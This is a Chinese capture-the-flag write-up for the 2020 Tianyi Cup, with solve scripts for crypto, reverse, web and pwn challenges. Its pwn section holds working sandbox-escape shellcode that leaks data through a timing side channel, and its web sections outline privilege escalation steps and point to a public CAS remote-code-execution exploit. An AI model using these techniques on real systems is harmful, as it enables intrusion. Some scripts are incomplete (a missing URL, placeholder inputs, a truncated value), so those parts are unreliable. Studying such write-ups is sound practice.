天翼杯2020_wp_by_LQers
本文首发于“合天智汇”公众号 作者:Mr.zhang
声明:笔者初衷用于分享与普及网络知识,若读者因此作出任何危害网络安全行为后果自负,与合天智汇及原作者无关!
misc
签到
# Ask the server for the tail of the resource, starting at byte offset 6291450000,
# and print the response body to stdout.
# NOTE(review): no target URL appears in this command as published; curl needs one as an argument.
curl -H "Range: bytes=6291450000-" --output /dev/stdout
{51a295f02d6f591b49fb0fa9d9003c9b}
strange number
from z3 import *
from pwn import *

# Connect to the challenge service and discard the first line it sends.
r = remote("183.129.189.60", 10023)
r.recvline()

# Read 20 rows of space-separated integers. Splitting on a single space leaves
# empty fields wherever the server pads with several spaces; those are dropped.
matrix = []
for _ in range(20):
    fields = r.recvline().strip().decode().split(' ')
    matrix.append([int(tok) for tok in fields if tok != ''])
print(matrix)

# One integer unknown per flag byte.
s = Solver()
x = [Int('x%d' % idx) for idx in range(20)]

# Each row is one linear equation: its first 20 entries are the coefficients
# and its last entry is the right-hand side.
for row in matrix:
    lhs = 0
    for j in range(20):
        lhs += x[j] * row[j]
    s.add(lhs == row[-1])

print(s.check())
print(s.model())

# Read the solved values back in variable order and show them as bytes.
result = [s.model()[var].as_long() for var in x]
print(bytes(result))
# flag:L1n3ar_funct10n
crypto
easyRSA
先找出e,再穷举flag。
# easyRSA solve script: find the public exponent e by trial, then recover the
# flag one character at a time by exhaustive search.

# RSA modulus used for every ciphertext below.
n = 53868412634233045090369153437747412878975425992040754576346754596620347350784422917543759897936684646663150893442998869763798006729979997564587680875175995309635877031073898192380128134509976889005408768734374216063639902277690308505919178272615191163114645916867249827856751349851814346547505622471483949937
# One ciphertext per flag character. The search below matches each entry against
# pow(ch, e, n) for a single printable byte, i.e. unpadded RSA applied per character.
# That encryption is deterministic, so equal entries in this list are equal characters.
flag = [
    36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870,
    30485289317489122513627424533258350515279207179552977911285197688270281245828407217991247923748564161409175076285380310289577344106125220128702373704159801265509969544840793736965464878414914537483701234228629064639374176394892003747894000649142798022157683437062596618574582761554787284372511226003550269371,
    3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603,
    25710430894158079311830714889718580974171581911002161989735153974074319352353008048142133029367435263698163394834768816086041815027231628825846495139208493868114079735178838159083476440613688096615701599646904740303121960899627887799112605887484922771885397056359474573599547493670021831421281871544848617729,
    19732968894700182005170322933853544733918556507218610879172101330791135258760048103574784092873604313932829411687518781796870112528816456829131236447610238430534513141439255353077893832475969071823784414902688155677656081948848412872244494057776570244585895585353001527113887752049634607310624731379054225973,
    49603823166275212373225350577680850241791038694173725226894961732112441988775475186232426203286108859938201515004660268704496760935793272426803644906304390902690585052664086332034549639604388540879672250182582474531712807630874468538276983688370936840051189314399257931504052240291478721105604232683571965735,
    3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603,
    36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870,
    30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611,
    10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753,
    39111600477742118705806395027906988208445577416201550388650540742347022379939784851496417589057003798020634385485932858409451138352913390310896030166781799764397194165567776360446226818994394507391829127511769351762441609027121311846867992195447845664286406943953929567958814340505351947630455475804285727484,
    36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870,
    20410654833843880836232625906280502202859672782729125051826685074510132406319832186711328043576717168143926086499155426957562863035893608063763496001467692730847514246434999398419384281899893374238711551517649464555301605989912669722238859406226125066118408050493138139068479714147539973518962897827574079593,
    36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870,
    7921134582753161322624290128634847155380402724851782664296670731383021765698194698795488878351754017043009294851033981478038403743577671361192735771763306447070861526914346664563552250711401128380349734350523225717871629577515929322968751140532497166587257175822120828394599888045317806403391547870859918022,
    10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753,
    37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388,
    37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388,
    3230183840782130132728550718879398529949011218584590214219970581894471595561557004203362354709970356734066395359248387914135714547693183197530370374482377328163905611411567039058080693820629261772459519178070810812194846437468479192532415093386483496307005949701166752528549311380452280458293080276726829603,
    39111600477742118705806395027906988208445577416201550388650540742347022379939784851496417589057003798020634385485932858409451138352913390310896030166781799764397194165567776360446226818994394507391829127511769351762441609027121311846867992195447845664286406943953929567958814340505351947630455475804285727484,
    30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611,
    15747738389149130546683323352487624099130536202521411140249777871780143886920854454890229471824528461849537673346295452973409717079527784378744780352239762449801001678008011753760911978134166483356246071627173861470601418554748959055745539267882513648338847817602838808623857409763494613906204746380746041743,
    37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388,
    49603823166275212373225350577680850241791038694173725226894961732112441988775475186232426203286108859938201515004660268704496760935793272426803644906304390902690585052664086332034549639604388540879672250182582474531712807630874468538276983688370936840051189314399257931504052240291478721105604232683571965735,
    37809519162220134190794179869071656253660637222651595716890486816819198670240449273217219092611534466839003562406526012393170182490664346796859412314807051075958172496172197098653619849179731703176156384686342627654694902901988586296739592097270627294547101302528720466472915869502035253270880461930808493388,
    41816082923294550015345177100947705941041384208212791124911658070475546413503648718489777663979623501758652560264344194036417126974018212069759723298990493830911260380987927219778671357273815320923993066160279132764029408453741387628321086125359271717932477562073380143941135757967992556738856891243384983881,
    2289661747463432904864726014469820089868859807681341604602724331315868027626911256942237265741150662379120096087503128257053991282511669446600149018298385954324456893093185337113453867043111379604256625373327695708031540726940582948952961996209717576768629087376812686254364929371492740503955614801880755029,
    4769150487876088158092207801833930492410418508766701697944250605734573379553037277899162828229262014063643323820460512403565006283703666233290157946979202583798598785822720156680345481949741468336883744252416349425692863975145641191695837839335637368844322856886906613050961753097516258566929761607581854452,
    30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611,
    10474662672025033041773365514312335540902032242267504195623117415683501726504952603558055485682046183041535826673296800918383074606402787027709571720464778282861332844110321181367277759299138792649236387268813934955882087855452773130837737108740698574126516301715777091874051282126020284661182410257231179753,
    7921134582753161322624290128634847155380402724851782664296670731383021765698194698795488878351754017043009294851033981478038403743577671361192735771763306447070861526914346664563552250711401128380349734350523225717871629577515929322968751140532497166587257175822120828394599888045317806403391547870859918022,
    30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611,
    36143793706265337073034755285680078528436882895525190723507534395950828118997628925090404438993072380573400767902990067482880570130224609722931177274849457403547171263972983019187913817796665882873998616231519206734202450449317963141346836996876520731298139484504046340552763094411316198407383338208856130870,
    17682515232429855272035901906772793825487721364344744362854466453245309632533244423538397321529685198664897252467080139806066355278301576555901412750048173484094398286014082522669828578258761701764108260931807262691138889541639002660481520728386113333127824444193307376521294377427870384102128500516960684947,
    4769150487876088158092207801833930492410418508766701697944250605734573379553037277899162828229262014063643323820460512403565006283703666233290157946979202583798598785822720156680345481949741468336883744252416349425692863975145641191695837839335637368844322856886906613050961753097516258566929761607581854452,
    30959931770895661365773662470290660506825261406067897465047950420463062950618600456650627514353480704138525843506175906147163722415875078456195887237951065474208725566820929688439489181815653581366068782107495855200442175091769300191401276169525885040982173400894816740864495713267532055984024720558728143611,
    33837532960782971009791077799738764896858649583072963199517227302081393621122306404955447605996320839470145314998033425661115068801570111325727613277035152575774982876149450313082012824128743218000149252557836744280911674724684003561337786214393597090329060449104920400289411467319248511722415235332423804311,
    30030303315850134541983623762793648940576863243875408346383336740002014977915867166596483716837565090899781937786444667011603255898645014579568163387075249462739655058635864271192704361549774337456607506026964549661765427917083344151333423310742416015343716142879418000874164534510255100626106244640607206741]
# Step 1: recover e. The search assumes the first plaintext character is 'f'
# and tries every exponent from 2 to 19999 until that ciphertext matches.
e = 0
for ee in range(2, 20000):
    if pow(ord('f'), ee, n ) == flag[0]:
        e = ee
        break
# Step 2: with e known, each ciphertext is matched against the encryption of
# every printable ASCII byte (0x20..0x7e); the first match is the plaintext character.
ans = []
for f in flag:
    for ch in range(0x20, 0x7f):
        if pow(ch, e, n) == f:
            ans.append(chr(ch))
            break
print(''.join(ans))
hardRSA
题目脚本:
# chall.py # flag{6809781d08e120627e623dcdafe26b8a} p = getPrime(510) q = getPrime(510) r = getPrime(510) e = 7 m = bytes_to_long(os.urandom(30) + flag) n = p * q * r d = invert(e, (p - 1) * (q - 1) * (r - 1)) c = pow(m, e, n) print(n // p) print(p) print(c) print(hex(d % (1 << 540)))
从题目看也是Coppersmith partial d的情况,只是这里由于$n$由$p、q、r$三个素数组成,因此需要我们重新推导同余方程
已知:$kbits = 540$、$p$、$qr$、$d_0$的值,$d_0 = d \mod 2^{kbits}$
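推导如下:记$s = q + r$,则$\varphi(n) = (p-1)(q-1)(r-1) = (p-1)(qr - s + 1)$。由$ed = 1 + k\varphi(n)$两边模$2^{kbits}$可得:
$$ed_0 \equiv 1 + k(p-1)(qr-s+1) \pmod{2^{kbits}} \tag{1}$$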
通过上式可以求得所有的$s \mod 2^{kbits}$的值(其中$s = q + r$),同时我们知道$r = s - q$,即:
$$qr = q(s-q) \tag{2}$$
联立公式$1 \times q$和公式$2 \times k(p-1)$,可以得到公式
$$ed_0q = q + kq(p-1)(qr-s+1) \tag{3}$$
$$k(p-1)qr = kq(p-1)(s-q) \tag{4}$$
相加得到:
$$ed_0q + k(p-1)qr = q+kq(p-1)(qr-q+1)$$
即:
$$ed_0q + k(p-1)qr-k(p-1)q(qr-q+1) = q \mod 2^{kbits}$$
解上述同余方程,即可得到$q \mod 2^{kbits}$
由于$kbits=540$,而$q$只有$510$ bits,所以解出来的就是可能的$q$的值,再通过$qr \bmod q = 0$过滤即可
def find_q(d0, kbits, e, qr, p):
    """Recover the prime q from the low `kbits` bits of the private exponent.

    For each multiplier k in 1..e, solve the congruence derived in the write-up
        e*d0*X + k(p-1)*qr - k(p-1)*X*(qr - X + 1) == X  (mod 2^kbits)
    and return the first root that divides `qr`. Returns None when no root does.

    This is Sage code: `^` is exponentiation, and `var`, `solve_mod` and `ZZ`
    are Sage built-ins.
    """
    X = var('X')
    modulus = 2 ^ kbits
    for k in range(1, e + 1):
        coeff = k*(p-1)
        congruence = [e*d0*X+coeff*qr-coeff*X*(qr-X+1)==X]
        for root in solve_mod(congruence, modulus):
            candidate = ZZ(root[0])
            # q has fewer bits than the modulus, so a true root is q itself
            # and must divide q*r exactly.
            if qr % candidate == 0:
                return candidate
    return None


if __name__ == '__main__':
    # Values printed by the challenge: q*r, p, the ciphertext and the low 540 bits of d.
    qr = 6857671284539062742975668483013695756136974308830302383869017675211748459038460434623218652374536550644287079851235538790745857383008797698872874798021995947967308637270510423795384863442755166813716746318469915880844736019524077541319597047087620854791342900521099848683663304636436936596021386279685708537
    p = 2141698433991046082370939321691850154692026423424010392532982575546199921995522418737105878977898158159119041866620684371362271661642476751663585379591337
    c = 4329606906986929520922207896899782825966852252045645553852666134465727605375552409314262439896695961792039946511877813768609658516837096110397826574615865145364406310497152725490038135469839136190625952342503082553246584871237205558902774064100332461452316195663446307120094941991930964324406679011451626126064494215289724959537793057773764253924636259378833228904446486925068109314698993641720938647836132806653451109926428309922461595730642461604303078237048
    d0 = 0x8e6f66a517d9c8a610eb65dac5a613e72d47a29beaa5c77a9eb857e0db5d09eadf3a317776fdf27b0d85db0b6677afc8e0683d6dc2b4580281b6e99c3050f649213c37
    e = 7
    kbits = 540
    q = find_q(d0, kbits, e, qr, p)
    print(q)
    # NOTE(review): the value below is as printed in the write-up; it has 70 digits
    # and is even, so it is presumably a truncated copy of the 510-bit prime.
    # q = 2505948797318027758820680066583904581437202552654881626817593379353882
alicehomework
经典的背包问题,而且density也远远不足0.9408
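from sage.all import *
from Crypto.Util.number import long_to_bytes

# Low-density attack on a knapsack cryptosystem, solved by lattice reduction.
# The write-up left the challenge data blank ("pk = ct ="); the two values
# below are placeholders and must be filled in before the script can run.
pk = ...  # placeholder: list of public-key weights (omitted in the write-up)
ct = ...  # placeholder: ciphertext integer (omitted in the write-up)
n = len(pk)

# Sanity check for application of low density attack
d = n / log(max(pk), 2)
print(CDF(d))
assert CDF(d) < 0.9408

# Build the (n+1) x (n+1) lattice basis:
#   rows 0..n-1 : 2*I_n with the public weights as the last column
#   row  n      : all ones with the ciphertext as the last column
M = Matrix.identity(n) * 2
last_row = [1 for x in pk]
M_last_row = Matrix(ZZ, 1, len(last_row), last_row)
# Build a new list rather than appending to pk, so the key list is not
# silently extended with the ciphertext.
last_col = pk + [ct]
M_last_col = Matrix(ZZ, len(last_col), 1, last_col)
M = M.stack(M_last_row)
M = M.augment(M_last_col)

X = M.BKZ()

# Look for the first reduced row whose first n entries are all +1 or -1;
# +1 maps to bit 0 and -1 maps to bit 1.
sol = []
for i in range(n + 1):
    testrow = X.row(i).list()[:-1]
    print(testrow)
    if set(testrow).issubset([-1, 1]):
        for v in testrow:
            if v == 1:
                sol.append(0)
            elif v == -1:
                sol.append(1)
        break

s = sol
print(s)
# Interpret the bits most-significant first and convert the integer to bytes.
result = [pow(2,len(s)-1-i)*s[i] for i in range(len(s))]
print(long_to_bytes(sum(result)))
# flag{8130e8c14fe4df06558c0a7ebf06f272}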
web
APITest
最近新学了nodejs,什么,我写的 API 有问题?【大部分flag为此形式:flag{可见字符串}或DASCTF{可见字符串},只需提交花括号内的可见字符串(大小写敏感);如果flag为其他形式,题目中会单独说明。】 http://183.129.189.60:54800
有个原题 https://xz.aliyun.com/t/7177#toc-6
第一步改成了 /becomeAdmin 来登录admin
POST /becomeAdmin {"value": 0.00000001}
其他步骤基本一致
-
随便登录一个用户
-
POST /becomeAdmin,利用javascript的sort特性得到admin权限
-
/updateUser,增加查看secret的权限
-
查看/serverInfo 拿到 secret
-
/init 传secret和上面拿到的一样,就拿到了admin的token了
-
用token访问/flag,拿到flag
apereocas
open /cas, getshell and flag in /flag【大部分flag为此形式:flag{可见字符串}或DASCTF{可见字符串},只需提交花括号内的可见字符串(大小写敏感);如果flag为其他形式,题目中会单独说明。】 http://183.129.189.60:55001 https://xpro-adl.91ctf.com/userdownload?filename=2007305f227ddc95f2e.war&type=attach&feature=custom
EXP直接打就可以了 https://github.com/langligelang/CAS_EXP
把源码里面的whoami改成其他命令,最后cat /flag
hardRSA
题目脚本:
DASCTF{7754cef7ac0cc97ff61262d3c888d482}
pwn
SafeBox
沙箱,open和read,没有write
line CODE JT JF K ================================= 0000: 0x20 0x00 0x00 0x00000004 A = arch 0001: 0x15 0x00 0x0b 0xc000003e if (A != ARCH_X86_64) goto 0013 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005 0004: 0x15 0x00 0x08 0xffffffff if (A != 0xffffffff) goto 0013 0005: 0x15 0x06 0x00 0x00000002 if (A == open) goto 0012 0006: 0x15 0x00 0x06 0x00000000 if (A != read) goto 0013 0007: 0x20 0x00 0x00 0x00000014 A = fd >> 32 # read(fd, buf, count) 0008: 0x25 0x03 0x00 0x00000000 if (A > 0x0) goto 0012 0009: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0013 0010: 0x20 0x00 0x00 0x00000010 A = fd # read(fd, buf, count) 0011: 0x35 0x00 0x01 0x00000004 if (A < 0x4) goto 0013 0012: 0x06 0x00 0x00 0x7fff0000 return ALLOW 0013: 0x06 0x00 0x00 0x00000000 return KILL
vmmap在0x10000,可以直接放置"/home/pwn/flag"
open后read,使用cmp比较,等于则使用jz进行死循环,否则ret退出
构造payload不能有'\x00',可以用一些操作达到,这里我用右移
# SafeBox solve script from the write-up. The seccomp filter shown above permits
# only open and read, so nothing can be written back; the script instead learns
# each flag byte from how long the target takes to finish (a timing side channel).
from pwn import *

EXCV = context.binary = './chall'
e = ELF(EXCV)
if args.I:
    context.log_level = 'debug'


def pwn(p, index, ch):
    """Send one probe testing whether flag byte `index` equals `ch`.

    p     -- pwntools tube connected to the target
    index -- offset of the flag byte being tested
    ch    -- candidate byte value

    The probe spins forever on a match and returns otherwise, so the caller
    tells the two cases apart by timing.
    """
    # open: the path string is appended after the code (see sendafter below).
    # The write-up places the buffer at 0x10000, so the path sits at 0x10032;
    # 0x10032aaa >> 12 yields that address without any '\x00' byte in the code.
    shellcode = "push 0x10032aaa; pop rdi; shr edi, 12; xor esi, esi; push 2; pop rax; syscall;"
    # re open, rax => 4
    # (the filter listed in the write-up only allows read on descriptors >= 4)
    shellcode += "push 2; pop rax; syscall;"
    # read(rax, 0x10040, 0x50)
    shellcode += "mov rdi, rax; xor eax, eax; push 0x50; pop rdx; push 0x10040aaa; pop rsi; shr esi, 12; syscall;"
    # cmp and jz: equal -> jump backwards and loop, not equal -> ret.
    # NOTE(review): the two branches differ only in the jump distance, presumably
    # because the cmp encoding is one byte shorter when the offset is 0 — confirm.
    if index == 0:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-3; ret".format(index, ch)
    else:
        shellcode += "cmp byte ptr[rsi+{0}], {1}; jz $-4; ret".format(index, ch)
    shellcode = asm(shellcode)
    # Pad the code to 0x40-14 bytes so the 14-byte path ends exactly at offset 0x40.
    p.sendafter("safe-execution box?\n", shellcode.ljust(0x40-14, b'a') + b'/home/pwn/flag')


index = 0
ans = []
while True:
    # A fresh process/connection is used for every (index, candidate) pair.
    for ch in range(0x20, 127):
        if args.R:
            p = remote('183.129.189.61', 60402)
        else:
            p = process(EXCV)
        pwn(p, index, ch)
        start = time.time()
        try:
            p.recv(timeout=2)
        except:
            # Any error from recv is ignored; only the elapsed time matters.
            pass
        end = time.time()
        p.close()
        # A wait of more than 1.5 s (recv timeout is 2 s) is taken as "target is spinning",
        # i.e. the candidate matched.
        if end-start > 1.5:
            ans.append(ch)
            print("".join([chr(i) for i in ans]))
            break
    else:
        # for/else: no candidate stalled at this index, so the flag is treated as complete.
        print("".join([chr(i) for i in ans]))
        break
    index = index + 1
print("".join([chr(i) for i in ans]))
DASCTF{0ee3530c57fb0b9c89e7af5d32b9f521}
re
mobile
# Write-up note (prose that was fused onto this line): an init routine was found;
# a breakpoint was set there and the system of equations present after init was dumped.
from scipy import linalg
import numpy as np

# A is the coefficient matrix (32 x 32).
A = np.array([[13,144,129,36,58,38,53,40,103,125,97,19,68,132,31,148,150,96,118,37,30,143,134,37,96,42,129,84,111,66,13,48],
              [127,111,102,17,111,100,120,73,34,144,78,86,133,48,64,141,110,15,10,37,128,119,68,104,137,12,97,29,46,11,116,116],
              [131,124,54,57,55,122,74,123,57,44,63,131,81,86,56,92,31,118,98,135,66,115,51,128,102,67,41,40,41,144,53,84],
              [105,121,74,132,40,66,62,61,18,103,107,51,133,85,132,137,52,42,69,79,70,147,54,43,50,145,54,69,58,58,47,136],
              [74,42,58,65,62,134,53,56,143,74,70,84,33,112,36,61,41,17,93,111,66,85,62,37,133,149,144,41,103,55,16,125],
              [132,117,53,57,104,125,10,78,19,34,25,126,134,139,90,22,138,142,56,87,43,116,39,74,105,61,54,48,62,136,87,129],
              [68,132,28,102,69,71,36,72,59,114,96,55,71,75,126,76,89,106,116,33,138,143,144,15,65,86,61,79,64,24,62,10],
              [99,14,24,141,45,68,25,124,120,108,29,71,38,10,83,63,121,44,30,112,107,85,66,82,56,137,39,34,39,58,116,125],
              [45,62,120,103,55,148,56,81,89,99,51,113,80,79,102,41,27,46,62,33,74,70,100,56,37,129,102,112,137,13,48,145],
              [52,61,60,47,57,80,111,150,44,78,16,59,131,24,45,106,51,78,146,19,113,105,137,16,47,96,84,33,89,135,60,139],
              [60,123,121,10,28,65,43,111,144,118,11,26,37,84,103,12,14,57,126,54,27,116,78,103,128,73,135,107,102,63,98,78],
              [60,67,58,48,119,54,78,10,45,46,120,138,67,27,148,61,69,29,34,104,116,55,72,98,88,137,72,86,118,79,29,113],
              [67,62,119,70,136,125,47,145,27,80,75,69,40,145,37,37,97,41,114,90,99,87,144,130,66,10,42,43,144,130,71,110],
              [112,123,138,117,118,52,64,120,90,140,95,122,22,33,123,29,147,100,133,92,106,39,48,101,30,149,86,117,15,61,28,96],
              [76,36,111,139,53,16,93,74,132,24,123,49,91,24,87,40,32,74,130,73,13,135,88,46,105,53,40,49,48,63,15,34],
              [131,89,133,145,112,124,81,129,105,78,121,69,10,129,133,27,123,108,117,121,55,122,38,128,136,53,81,29,70,45,127,40],
              [134,133,51,63,124,110,47,117,75,34,148,29,112,90,87,83,123,25,20,148,81,38,95,129,117,72,48,33,104,38,21,143],
              [114,141,18,75,71,113,120,48,37,59,102,133,120,80,113,49,138,23,78,75,11,141,76,72,17,23,118,61,105,83,66,135],
              [113,83,105,92,102,24,58,126,46,23,34,83,89,62,102,69,16,102,103,147,46,28,101,42,20,17,27,11,132,133,119,68],
              [65,41,95,41,134,135,135,53,38,131,93,71,82,49,115,48,80,68,50,51,28,90,101,34,24,145,75,146,120,60,93,112],
              [24,82,139,150,113,128,36,130,47,32,93,53,122,39,96,19,131,33,42,123,80,113,108,24,73,117,131,81,29,66,20,149],
              [28,124,56,35,59,120,96,113,87,111,80,123,134,64,87,87,114,146,123,23,125,55,115,61,36,77,124,105,23,141,110,49],
              [112,85,116,86,54,150,85,86,108,86,45,36,87,122,51,54,75,44,104,103,35,128,143,73,69,13,47,38,68,12,122,50],
              [65,27,109,105,60,124,90,12,51,61,26,143,140,37,65,13,52,139,77,89,138,114,107,23,141,23,85,74,119,106,90,116],
              [20,64,138,52,23,97,52,38,135,65,26,134,135,14,143,32,110,52,50,80,133,66,69,90,78,20,147,28,115,27,93,48],
              [81,96,121,62,145,94,10,22,105,23,125,105,42,130,139,85,29,19,38,51,98,139,85,80,106,55,41,42,149,145,12,74],
              [18,132,72,121,138,97,104,74,40,81,33,103,113,85,32,29,146,88,27,137,36,126,32,56,37,29,82,89,79,100,87,72],
              [90,93,68,87,52,75,138,122,138,84,141,13,59,113,102,119,137,55,27,146,52,18,65,78,44,135,139,88,107,138,116,16],
              [44,100,139,101,13,76,68,17,56,74,72,27,102,28,70,108,46,39,34,46,142,17,141,60,52,103,136,70,20,102,147,98],
              [55,17,14,33,77,134,147,75,124,60,82,116,26,146,49,110,44,128,54,147,107,58,66,143,24,90,22,92,139,73,141,129],
              [134,84,27,62,46,34,58,144,43,136,107,11,82,95,24,117,57,113,73,44,91,141,44,60,128,142,96,57,127,60,74,54],
              [138,119,118,61,130,146,11,65,92,82,60,114,54,139,148,84,110,141,142,84,21,70,54,120,48,93,104,98,39,103,29,104]])
# y is the right-hand side: one expected value per equation.
y = np.array([0x384E9, 0x3AFD0, 0x398A1, 0x3B564, 0x34B76, 0x3C62C, 0x37432, 0x32D5D,0x38F35, 0x353F9, 0x357BC, 0x36AD4, 0x3B78A, 0x41D2D, 0x2F302, 0x43F88,0x3D180, 0x3C9E2, 0x330D3, 0x3DBB3, 0x3D102, 0x3FA50, 0x3859F, 0x396B7,0x336FD, 0x35B83, 0x39701, 0x402F4, 0x36160, 0x3C29B, 0x373F5, 0x43A68])
# Solve A @ x = y. The solver works in floating point, so the printed values
# need rounding to the nearest integer before being read as character codes.
x = linalg.solve(A, y)
print(x)
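# Character codes of the flag, taken from the solution of the linear system.
flag1 = [102, 108, 97, 103, 123, 119, 101, 49, 49, 95, 121, 48, 117, 95, 102, 48, 117, 110, 100, 95, 49, 55, 95, 99, 48, 110, 103, 114, 52, 55, 122, 125]
# The original reused the name `flag` for both the code list and the output
# string, so the list was overwritten by "" and nothing was decoded; the list
# is now `flag1`, the name the decoding loop already referred to.
flag = "".join(chr(code) for code in flag1)
print(flag)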
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022